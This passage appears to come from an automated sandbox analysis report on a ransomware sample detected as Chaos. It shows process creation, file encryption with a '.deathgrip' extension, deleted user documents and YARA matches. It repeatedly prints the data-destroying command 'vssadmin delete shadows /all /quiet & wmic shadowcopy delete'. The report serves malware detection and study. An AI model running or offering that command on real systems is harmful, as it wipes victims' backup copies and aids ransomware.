                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /C yvssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: main.exe, 00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /C yvssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: main.exe, 00000003.00000002.1511976435.0000000002531000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: /C yvssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy deleteJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: vssadmin.exe, 00000021.00000002.1772875193.00000217E8590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet vssadmin delete shadows /all /quiet Winsta0\Default
                  Source: vssadmin.exe, 00000021.00000002.1772875193.00000217E8590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                  May disable shadow drive data (uses vssadmin)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Modifies existing user documents (likely ransomware behavior)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docxJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docxJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.xlsxJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.xlsxJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.xlsxJump to behavior
                  Writes many files with high entropy
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile created: C:\Users\user\Desktop\Mai.exe entropy: 7.9968743048Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\override_list.pb.gz.deathgrip entropy: 7.99962811105Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.deathgrip entropy: 7.99020183438Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.deathgrip entropy: 7.99973319787Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409677868939833.txt.deathgrip entropy: 7.99850920276Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json.deathgrip entropy: 7.99992412255Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.deathgrip entropy: 7.99265157954Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.deathgrip entropy: 7.99813782241Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.deathgrip entropy: 7.99979787036Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.deathgrip entropy: 7.99858030532Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log.deathgrip entropy: 7.99765929568Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.deathgrip entropy: 7.99982344648Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.deathgrip entropy: 7.99323369737Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.deathgrip entropy: 7.99119841684Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Temp\jusched.log.deathgrip entropy: 7.99502816224Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.deathgrip entropy: 7.99018439162Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.deathgrip entropy: 7.99045472682Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.deathgrip entropy: 7.99173810317Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Temp\msedge_installer.log.deathgrip entropy: 7.99091263003Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.deathgrip entropy: 7.99699399935Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt.deathgrip entropy: 7.99928789051Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt.deathgrip entropy: 7.9998599357Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt.deathgrip entropy: 7.99944515345Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsglobals.txt.deathgrip entropy: 7.99546922617Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json.deathgrip entropy: 7.99878317943Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt.deathgrip entropy: 7.99962464094Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.deathgrip entropy: 7.99605726156Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt.deathgrip entropy: 7.99914693362Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt.deathgrip entropy: 7.99807190347Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{29565D0C-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.deathgrip entropy: 7.99958130331Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-child-current.bin.deathgrip entropy: 7.99991082537Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\uANxnX_BheDjd2-cdR8N9DEWlds[1].css.deathgrip entropy: 7.99192232165Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.deathgrip entropy: 7.99745292642Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.deathgrip entropy: 7.99910960091Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.deathgrip entropy: 7.99398306461Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Windows\WebCache\V01.log.deathgrip entropy: 7.99968155689Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Windows\WebCache\V0100009.log.deathgrip entropy: 7.99967383224Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.deathgrip entropy: 7.99119668899Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.deathgrip entropy: 7.99968254024Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.deathgrip entropy: 7.99646020294Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin.deathgrip entropy: 7.99953676863Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Diagnostics\1612347604\2023100507.000\results.xsl.deathgrip entropy: 7.99630723167Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json.deathgrip entropy: 7.99118805853Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.deathgrip entropy: 7.99671414757Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\first_party_sets.db.deathgrip entropy: 7.99550060783Jump to dropped file

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects destructive malware Author: Florian Roth
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chaos ransomware Author: ditekSHen
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPEMatched rule: Detects Chaos ransomware Author: ditekSHen
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chaos ransomware Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects Chaos ransomware Author: ditekSHen
                  .NET source code contains very large strings
                  Source: svchost.exe.3.dr, Program.csLong String: Length: 664960
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00047A8F: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00047A8F
                  Source: C:\Windows\System32\wbadmin.exeFile created: C:\Windows\Logs\WindowsBackup
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000492A60_2_000492A6
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00057DAC0_2_00057DAC
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000660F80_2_000660F8
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000582230_2_00058223
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000552520_2_00055252
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000502D70_2_000502D7
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000663270_2_00066327
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000513D60_2_000513D6
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000573FE0_2_000573FE
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0006E4500_2_0006E450
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000555800_2_00055580
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000507800_2_00050780
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0004D8130_2_0004D813
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005887F0_2_0005887F
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0006E8FE0_2_0006E8FE
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000439430_2_00043943
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00072A040_2_00072A04
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00044A6E0_2_00044A6E
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0004FCAC0_2_0004FCAC
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00042EB60_2_00042EB6
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00054FE10_2_00054FE1
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD667E4C2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6772BC2_2_00007FF6DD6772BC
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6579502_2_00007FF6DD657950
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6763702_2_00007FF6DD676370
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD661E942_2_00007FF6DD661E94
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD665F302_2_00007FF6DD665F30
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD67471C2_2_00007FF6DD67471C
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD671EE42_2_00007FF6DD671EE4
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6636E02_2_00007FF6DD6636E0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6686D02_2_00007FF6DD6686D0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD676D702_2_00007FF6DD676D70
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD662D502_2_00007FF6DD662D50
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6765EC2_2_00007FF6DD6765EC
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6620A02_2_00007FF6DD6620A0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6618802_2_00007FF6DD661880
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD667E4C2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD651F502_2_00007FF6DD651F50
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD670F382_2_00007FF6DD670F38
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD66E01C2_2_00007FF6DD66E01C
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD679FF82_2_00007FF6DD679FF8
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD658FD02_2_00007FF6DD658FD0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6622A42_2_00007FF6DD6622A4
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD670F382_2_00007FF6DD670F38
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD661A842_2_00007FF6DD661A84
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6742802_2_00007FF6DD674280
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD66EB302_2_00007FF6DD66EB30
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD663AE42_2_00007FF6DD663AE4
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD66E4B02_2_00007FF6DD66E4B0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD667C982_2_00007FF6DD667C98
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD661C902_2_00007FF6DD661C90
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD66A4302_2_00007FF6DD66A430
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA456B1D04_2_00007FFBA456B1D0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46284A04_2_00007FFBA46284A0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA462E4A04_2_00007FFBA462E4A0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45CF5704_2_00007FFBA45CF570
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45E95504_2_00007FFBA45E9550
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46095304_2_00007FFBA4609530
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45EE5304_2_00007FFBA45EE530
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45B25F04_2_00007FFBA45B25F0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45D46604_2_00007FFBA45D4660
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45DA7054_2_00007FFBA45DA705
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45FD6E04_2_00007FFBA45FD6E0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46347904_2_00007FFBA4634790
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45CC7204_2_00007FFBA45CC720
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45F87E04_2_00007FFBA45F87E0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46087B04_2_00007FFBA46087B0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45B58704_2_00007FFBA45B5870
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A28504_2_00007FFBA45A2850
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46471104_2_00007FFBA4647110
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46041104_2_00007FFBA4604110
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45B70E04_2_00007FFBA45B70E0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A40F04_2_00007FFBA45A40F0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46551304_2_00007FFBA4655130
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45B11204_2_00007FFBA45B1120
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46422104_2_00007FFBA4642210
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46461D04_2_00007FFBA46461D0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45BC1B04_2_00007FFBA45BC1B0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45B82904_2_00007FFBA45B8290
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45BB3004_2_00007FFBA45BB300
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45C52C04_2_00007FFBA45C52C0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA464B2C04_2_00007FFBA464B2C0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA464D2A04_2_00007FFBA464D2A0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46562A04_2_00007FFBA46562A0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45C62B04_2_00007FFBA45C62B0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46543904_2_00007FFBA4654390
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A43904_2_00007FFBA45A4390
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46143504_2_00007FFBA4614350
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A64004_2_00007FFBA45A6400
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46413E04_2_00007FFBA46413E0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45CD3F04_2_00007FFBA45CD3F0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46433B04_2_00007FFBA46433B0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA460F3A04_2_00007FFBA460F3A0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45E33B04_2_00007FFBA45E33B0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A94804_2_00007FFBA45A9480
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45CB4904_2_00007FFBA45CB490
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46274604_2_00007FFBA4627460
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA462A4304_2_00007FFBA462A430
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45F9D104_2_00007FFBA45F9D10
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45C2D104_2_00007FFBA45C2D10
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45B8CF04_2_00007FFBA45B8CF0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A3CA04_2_00007FFBA45A3CA0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45AFD604_2_00007FFBA45AFD60
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A6D424_2_00007FFBA45A6D42
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4652DA04_2_00007FFBA4652DA0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45E7E404_2_00007FFBA45E7E40
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45F8E304_2_00007FFBA45F8E30
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A8F104_2_00007FFBA45A8F10
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA460DEB04_2_00007FFBA460DEB0
